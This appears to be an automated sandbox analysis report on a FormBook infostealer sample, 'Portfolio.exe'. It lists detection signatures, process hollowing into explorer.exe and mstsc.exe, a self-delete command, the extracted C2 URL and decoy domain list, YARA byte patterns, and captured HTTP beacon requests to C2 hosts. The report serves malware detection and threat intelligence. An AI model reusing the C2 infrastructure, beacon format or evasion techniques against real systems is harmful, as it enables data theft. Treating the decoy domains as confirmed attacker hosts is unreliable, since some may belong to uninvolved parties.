Play interactive tour

Edit tour

Analysis Report Portfolio.exe

Overview

General Information

Sample Name:	Portfolio.exe
Analysis ID:	385265
MD5:	9fa479c87543e7dd199296f7029991c9
SHA1:	649bf55700b6828989dbcf4c5d792ba93fa5b2e0
SHA256:	5cb8d74227cc43368e24ef8f94c5ae38a2f2c259a1701b1efa4f6b5042e4544d
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Portfolio.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\Portfolio.exe' MD5: 9FA479C87543E7DD199296F7029991C9)

Portfolio.exe (PID: 2964 cmdline: C:\Users\user\Desktop\Portfolio.exe MD5: 9FA479C87543E7DD199296F7029991C9)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

mstsc.exe (PID: 1320 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)

cmd.exe (PID: 6216 cmdline: /c del 'C:\Users\user\Desktop\Portfolio.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fromthepittothepitts.com/dwj/"], "decoy": ["timemine.net", "hochzeitsfotograf-kirchheim.com", "pinebrotherstreeservices.com", "nitthaidessert.com", "azbysdqis.icu", "lamamex.com", "betonelon.com", "instagram-copyrighteam.com", "balela.info", "silversageresidentialllc.com", "receitaideal.com", "di-rinse.com", "relicensetests.com", "wobidoo.singles", "sanjosemicroschools.com", "southwonstondogtrainingclub.com", "vasayopianju.com", "falcontehnik.com", "hoytslandscaping.com", "colorprintagencia.com", "72222006.com", "rqgxbl.com", "bike-open.com", "delivachelicatering.com", "eorpp.com", "indianwants.com", "byonf.com", "damayaran.com", "rhusart-shop.com", "elusivelabs.net", "medeins.com", "itristore.com", "andalusier-united.com", "andersensweddinginvitations.com", "devinpennings.com", "vinegret.com", "veravzznt.asia", "facemaskbuyer.com", "oregonbirdhouse.com", "onyxcondoms.com", "cutfd.com", "856379601.xyz", "notmad-nomads.com", "eversourcecredit.com", "scaledsales.com", "hailstoneclayfairy.com", "merishare.com", "verified-igcenter.com", "thehappytester.com", "act360.xyz", "warehouseteam.com", "lingwid.com", "bodyizaverb.store", "oldguyinthesky.com", "cualosun.com", "timcrozier.com", "binghamtonplumber.com", "1956west10th.com", "covid-19sales.com", "anshcgsab50sd.com", "wfxinbang.com", "eldiaqueashtonmetwitteo.com", "cmhbhhy.icu", "cursosinemlinea.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16dbd0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16de4a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x19a1f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x19a46a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x17996d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1a5f8d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x179459:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1a5a79:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x179a6f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1a608f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x179be7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1a6207:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x16e862:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x19ae82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1786d4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1a4cf4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x16f55b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17f60f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1abc2f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x180612:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17c6f1:$sqlite3step: 68 34 1C 7B E1 0x17c804:$sqlite3step: 68 34 1C 7B E1 0x1a8d11:$sqlite3step: 68 34 1C 7B E1 0x1a8e24:$sqlite3step: 68 34 1C 7B E1 0x17c720:$sqlite3text: 68 38 2A 90 C5 0x17c845:$sqlite3text: 68 38 2A 90 C5 0x1a8d40:$sqlite3text: 68 38 2A 90 C5 0x1a8e65:$sqlite3text: 68 38 2A 90 C5 0x17c733:$sqlite3blob: 68 53 D8 7F 8C 0x17c85b:$sqlite3blob: 68 53 D8 7F 8C 0x1a8d53:$sqlite3blob: 68 53 D8 7F 8C 0x1a8e7b:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Portfolio.exe PID: 5880	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.Portfolio.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.Portfolio.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Portfolio.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
3.2.Portfolio.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.Portfolio.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Portfolio.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.fromthepittothepitts.com/dwj/"], "decoy": ["timemine.net", "hochzeitsfotograf-kirchheim.com", "pinebrotherstreeservices.com", "nitthaidessert.com", "azbysdqis.icu", "lamamex.com", "betonelon.com", "instagram-copyrighteam.com", "balela.info", "silversageresidentialllc.com", "receitaideal.com", "di-rinse.com", "relicensetests.com", "wobidoo.singles", "sanjosemicroschools.com", "southwonstondogtrainingclub.com", "vasayopianju.com", "falcontehnik.com", "hoytslandscaping.com", "colorprintagencia.com", "72222006.com", "rqgxbl.com", "bike-open.com", "delivachelicatering.com", "eorpp.com", "indianwants.com", "byonf.com", "damayaran.com", "rhusart-shop.com", "elusivelabs.net", "medeins.com", "itristore.com", "andalusier-united.com", "andersensweddinginvitations.com", "devinpennings.com", "vinegret.com", "veravzznt.asia", "facemaskbuyer.com", "oregonbirdhouse.com", "onyxcondoms.com", "cutfd.com", "856379601.xyz", "notmad-nomads.com", "eversourcecredit.com", "scaledsales.com", "hailstoneclayfairy.com", "merishare.com", "verified-igcenter.com", "thehappytester.com", "act360.xyz", "warehouseteam.com", "lingwid.com", "bodyizaverb.store", "oldguyinthesky.com", "cualosun.com", "timcrozier.com", "binghamtonplumber.com", "1956west10th.com", "covid-19sales.com", "anshcgsab50sd.com", "wfxinbang.com", "eldiaqueashtonmetwitteo.com", "cmhbhhy.icu", "cursosinemlinea.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Portfolio.exe	Virustotal: Detection: 34%			Perma Link
Source: Portfolio.exe	ReversingLabs: Detection: 16%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501446234.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.501316678.0000000004E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Portfolio.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Portfolio.exe

Joe Sandbox ML: detected

Source: 3.2.Portfolio.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Portfolio.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Portfolio.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: Portfolio.exe, 00000003.00000003.249066077.00000000017C0000.00000004.00000001.sdmp, mstsc.exe, 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Portfolio.exe, mstsc.exe
Source:	Binary string: mstsc.pdbGCTL source: Portfolio.exe, 00000003.00000002.296664211.0000000003570000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdb source: Portfolio.exe, 00000003.00000002.296664211.0000000003570000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01AD60B0
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01AD60A2
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01AD6E20
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_01AD6E10
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then pop edi	3_2_00416B78
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then pop edi	3_2_00416C7F
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then pop edi	3_2_00416CB5
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then pop edi	3_2_00417D49
Source: C:\Users\user\Desktop\Portfolio.exe	Code function: 4x nop then pop edi	3_2_00417D07
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4x nop then pop edi	14_2_03046B78
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4x nop then pop edi	14_2_03047D07
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4x nop then pop edi	14_2_03047D49
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4x nop then pop edi	14_2_03046C7F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4x nop then pop edi	14_2_03046CB5

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.fromthepittothepitts.com/dwj/

Source: global traffic	HTTP traffic detected: GET /dwj/?Cj=lN985vvxrLh4&HTrLdvY=vjdFX+deElwkJL3jjCyofcRGlviK7hY6fmHNPu6niYhLdTNZ+9C3ClVYQHWQZWwEwEGo HTTP/1.1Host: www.timcrozier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dwj/?HTrLdvY=e+9w//LrkNQAvat7yjjfVebmP7O5RIC5nL700LrPx65Ls1GCtX2Cw2Ubn7E5A1TTieM1&Cj=lN985vvxrLh4 HTTP/1.1Host: www.fromthepittothepitts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dwj/?Cj=lN985vvxrLh4&HTrLdvY=jCwgb33wmR2YDM1wuLgRTH38yeb9sMyK3XA0ZXE7/yU9OdwyZBI+RqEK8elpwbEptz+b HTTP/1.1Host: www.scaledsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 72.167.241.46 72.167.241.46

Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View	ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK

Source: global traffic	HTTP traffic detected: GET /dwj/?Cj=lN985vvxrLh4&HTrLdvY=vjdFX+deElwkJL3jjCyofcRGlviK7hY6fmHNPu6niYhLdTNZ+9C3ClVYQHWQZWwEwEGo HTTP/1.1Host: www.timcrozier.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dwj/?HTrLdvY=e+9w//LrkNQAvat7yjjfVebmP7O5RIC5nL700LrPx65Ls1GCtX2Cw2Ubn7E5A1TTieM1&Cj=lN985vvxrLh4 HTTP/1.1Host: www.fromthepittothepitts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dwj/?Cj=lN985vvxrLh4&HTrLdvY=jCwgb33wmR2YDM1wuLgRTH38yeb9sMyK3XA0ZXE7/yU9OdwyZBI+RqEK8elpwbEptz+b HTTP/1.1Host: www.scaledsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: clientconfig.passport.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Apr 2021 07:18:14 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "5cf0c6a3-1df"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 